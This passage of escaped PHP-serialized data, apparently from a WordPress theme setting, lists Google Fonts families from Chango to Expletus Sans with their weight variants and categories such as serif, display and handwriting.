One\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Chango\";a:3:{s:5:\"label\";s:6:\"Chango\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Charm\";a:3:{s:5:\"label\";s:5:\"Charm\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Charmonman\";a:3:{s:5:\"label\";s:10:\"Charmonman\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Chathura\";a:3:{s:5:\"label\";s:8:\"Chathura\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Chau Philomene One\";a:3:{s:5:\"label\";s:18:\"Chau Philomene One\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Chela One\";a:3:{s:5:\"label\";s:9:\"Chela One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Chelsea Market\";a:3:{s:5:\"label\";s:14:\"Chelsea Market\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Chenla\";a:3:{s:5:\"label\";s:6:\"Chenla\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Cherry Cream Soda\";a:3:{s:5:\"label\";s:17:\"Cherry Cream Soda\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Cherry Swash\";a:3:{s:5:\"label\";s:12:\"Cherry Swash\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Chewy\";a:3:{s:5:\"label\";s:5:\"Chewy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Chicle\";a:3:{s:5:\"label\";s:6:\"Chicle\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Chilanka\";a:3:{s:5:\"label\";s:8:\"Chilanka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Chivo\";a:3:{s:5:\"label\";s:5:\"Chivo\";s:8:\"variants\";a:8:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Chonburi\";a:3:{s:5:\"label\";s:8:\"Chonburi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Cinzel\";a:3:{s:5:\"label\";s:6:\"Cinzel\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Cinzel Decorative\";a:3:{s:5:\"label\";s:17:\"Cinzel Decorative\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"900\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Clicker Script\";a:3:{s:5:\"label\";s:14:\"Clicker Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Coda\";a:3:{s:5:\"label\";s:4:\"Coda\";s:8:\"variants\";a:2:{i:0;s:3:\"800\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Coda Caption\";a:3:{s:5:\"label\";s:12:\"Coda Caption\";s:8:\"variants\";a:1:{i:0;s:3:\"800\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Codystar\";a:3:{s:5:\"label\";s:8:\"Codystar\";s:8:\"variants\";a:2:{i:0;s:3:\"300\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Coiny\";a:3:{s:5:\"label\";s:5:\"Coiny\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Combo\";a:3:{s:5:\"label\";s:5:\"Combo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Comfortaa\";a:3:{s:5:\"label\";s:9:\"Comfortaa\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Comic Neue\";a:3:{s:5:\"label\";s:10:\"Comic Neue\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Coming Soon\";a:3:{s:5:\"label\";s:11:\"Coming Soon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Commissioner\";a:3:{s:5:\"label\";s:12:\"Commissioner\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Concert One\";a:3:{s:5:\"label\";s:11:\"Concert One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Condiment\";a:3:{s:5:\"label\";s:9:\"Condiment\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Content\";a:3:{s:5:\"label\";s:7:\"Content\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Contrail One\";a:3:{s:5:\"label\";s:12:\"Contrail One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Convergence\";a:3:{s:5:\"label\";s:11:\"Convergence\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Cookie\";a:3:{s:5:\"label\";s:6:\"Cookie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Copse\";a:3:{s:5:\"label\";s:5:\"Copse\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Corben\";a:3:{s:5:\"label\";s:6:\"Corben\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Cormorant\";a:3:{s:5:\"label\";s:9:\"Cormorant\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Cormorant Garamond\";a:3:{s:5:\"label\";s:18:\"Cormorant Garamond\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Cormorant Infant\";a:3:{s:5:\"label\";s:16:\"Cormorant Infant\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Cormorant SC\";a:3:{s:5:\"label\";s:12:\"Cormorant SC\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Cormorant Unicase\";a:3:{s:5:\"label\";s:17:\"Cormorant Unicase\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Cormorant Upright\";a:3:{s:5:\"label\";s:17:\"Cormorant Upright\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Courgette\";a:3:{s:5:\"label\";s:9:\"Courgette\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Courier Prime\";a:3:{s:5:\"label\";s:13:\"Courier Prime\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"Cousine\";a:3:{s:5:\"label\";s:7:\"Cousine\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:8:\"Coustard\";a:3:{s:5:\"label\";s:8:\"Coustard\";s:8:\"variants\";a:2:{i:0;s:3:\"900\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:21:\"Covered By Your Grace\";a:3:{s:5:\"label\";s:21:\"Covered By Your Grace\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Crafty Girls\";a:3:{s:5:\"label\";s:12:\"Crafty Girls\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Creepster\";a:3:{s:5:\"label\";s:9:\"Creepster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Crete Round\";a:3:{s:5:\"label\";s:11:\"Crete Round\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Crimson Pro\";a:3:{s:5:\"label\";s:11:\"Crimson Pro\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Crimson Text\";a:3:{s:5:\"label\";s:12:\"Crimson Text\";s:8:\"variants\";a:6:{i:0;s:3:\"600\";i:1;s:9:\"600italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Croissant One\";a:3:{s:5:\"label\";s:13:\"Croissant One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Crushed\";a:3:{s:5:\"label\";s:7:\"Crushed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Cuprum\";a:3:{s:5:\"label\";s:6:\"Cuprum\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Cute Font\";a:3:{s:5:\"label\";s:9:\"Cute Font\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Cutive\";a:3:{s:5:\"label\";s:6:\"Cutive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Cutive Mono\";a:3:{s:5:\"label\";s:11:\"Cutive Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"DM Mono\";a:3:{s:5:\"label\";s:7:\"DM Mono\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"DM Sans\";a:3:{s:5:\"label\";s:7:\"DM Sans\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"DM Serif Display\";a:3:{s:5:\"label\";s:16:\"DM Serif Display\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"DM Serif Text\";a:3:{s:5:\"label\";s:13:\"DM Serif Text\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Damion\";a:3:{s:5:\"label\";s:6:\"Damion\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Dancing Script\";a:3:{s:5:\"label\";s:14:\"Dancing Script\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Dangrek\";a:3:{s:5:\"label\";s:7:\"Dangrek\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Darker Grotesque\";a:3:{s:5:\"label\";s:16:\"Darker Grotesque\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"David Libre\";a:3:{s:5:\"label\";s:11:\"David Libre\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Dawning of a New Day\";a:3:{s:5:\"label\";s:20:\"Dawning of a New Day\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Days One\";a:3:{s:5:\"label\";s:8:\"Days One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Dekko\";a:3:{s:5:\"label\";s:5:\"Dekko\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Dela Gothic One\";a:3:{s:5:\"label\";s:15:\"Dela Gothic One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Delius\";a:3:{s:5:\"label\";s:6:\"Delius\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:17:\"Delius Swash Caps\";a:3:{s:5:\"label\";s:17:\"Delius Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Delius Unicase\";a:3:{s:5:\"label\";s:14:\"Delius Unicase\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Della Respira\";a:3:{s:5:\"label\";s:13:\"Della Respira\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Denk One\";a:3:{s:5:\"label\";s:8:\"Denk One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Devonshire\";a:3:{s:5:\"label\";s:10:\"Devonshire\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Dhurjati\";a:3:{s:5:\"label\";s:8:\"Dhurjati\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Didact Gothic\";a:3:{s:5:\"label\";s:13:\"Didact Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Diplomata\";a:3:{s:5:\"label\";s:9:\"Diplomata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Diplomata SC\";a:3:{s:5:\"label\";s:12:\"Diplomata SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Do Hyeon\";a:3:{s:5:\"label\";s:8:\"Do Hyeon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Dokdo\";a:3:{s:5:\"label\";s:5:\"Dokdo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Domine\";a:3:{s:5:\"label\";s:6:\"Domine\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Donegal One\";a:3:{s:5:\"label\";s:11:\"Donegal One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Doppio One\";a:3:{s:5:\"label\";s:10:\"Doppio One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Dorsa\";a:3:{s:5:\"label\";s:5:\"Dorsa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Dosis\";a:3:{s:5:\"label\";s:5:\"Dosis\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"DotGothic16\";a:3:{s:5:\"label\";s:11:\"DotGothic16\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Dr Sugiyama\";a:3:{s:5:\"label\";s:11:\"Dr Sugiyama\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Duru Sans\";a:3:{s:5:\"label\";s:9:\"Duru Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Dynalight\";a:3:{s:5:\"label\";s:9:\"Dynalight\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"EB Garamond\";a:3:{s:5:\"label\";s:11:\"EB Garamond\";s:8:\"variants\";a:10:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Eagle Lake\";a:3:{s:5:\"label\";s:10:\"Eagle Lake\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"East Sea Dokdo\";a:3:{s:5:\"label\";s:14:\"East Sea Dokdo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Eater\";a:3:{s:5:\"label\";s:5:\"Eater\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Economica\";a:3:{s:5:\"label\";s:9:\"Economica\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Eczar\";a:3:{s:5:\"label\";s:5:\"Eczar\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"El Messiri\";a:3:{s:5:\"label\";s:10:\"El Messiri\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Electrolize\";a:3:{s:5:\"label\";s:11:\"Electrolize\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Elsie\";a:3:{s:5:\"label\";s:5:\"Elsie\";s:8:\"variants\";a:2:{i:0;s:3:\"900\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Elsie Swash Caps\";a:3:{s:5:\"label\";s:16:\"Elsie Swash Caps\";s:8:\"variants\";a:2:{i:0;s:3:\"900\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Emblema One\";a:3:{s:5:\"label\";s:11:\"Emblema One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Emilys Candy\";a:3:{s:5:\"label\";s:12:\"Emilys Candy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Encode Sans\";a:3:{s:5:\"label\";s:11:\"Encode Sans\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Encode Sans Condensed\";a:3:{s:5:\"label\";s:21:\"Encode Sans Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Encode Sans Expanded\";a:3:{s:5:\"label\";s:20:\"Encode Sans Expanded\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Encode Sans SC\";a:3:{s:5:\"label\";s:14:\"Encode Sans SC\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:26:\"Encode Sans Semi Condensed\";a:3:{s:5:\"label\";s:26:\"Encode Sans Semi Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:25:\"Encode Sans Semi Expanded\";a:3:{s:5:\"label\";s:25:\"Encode Sans Semi Expanded\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Engagement\";a:3:{s:5:\"label\";s:10:\"Engagement\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Englebert\";a:3:{s:5:\"label\";s:9:\"Englebert\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Enriqueta\";a:3:{s:5:\"label\";s:9:\"Enriqueta\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Epilogue\";a:3:{s:5:\"label\";s:8:\"Epilogue\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Erica One\";a:3:{s:5:\"label\";s:9:\"Erica One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Esteban\";a:3:{s:5:\"label\";s:7:\"Esteban\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Euphoria Script\";a:3:{s:5:\"label\";s:15:\"Euphoria Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Ewert\";a:3:{s:5:\"label\";s:5:\"Ewert\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:3:\"Exo\";a:3:{s:5:\"label\";s:3:\"Exo\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Exo 2\";a:3:{s:5:\"label\";s:5:\"Exo 2\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Expletus Sans\";a:3:{s:5:\"label\";s:13:\"Expletus 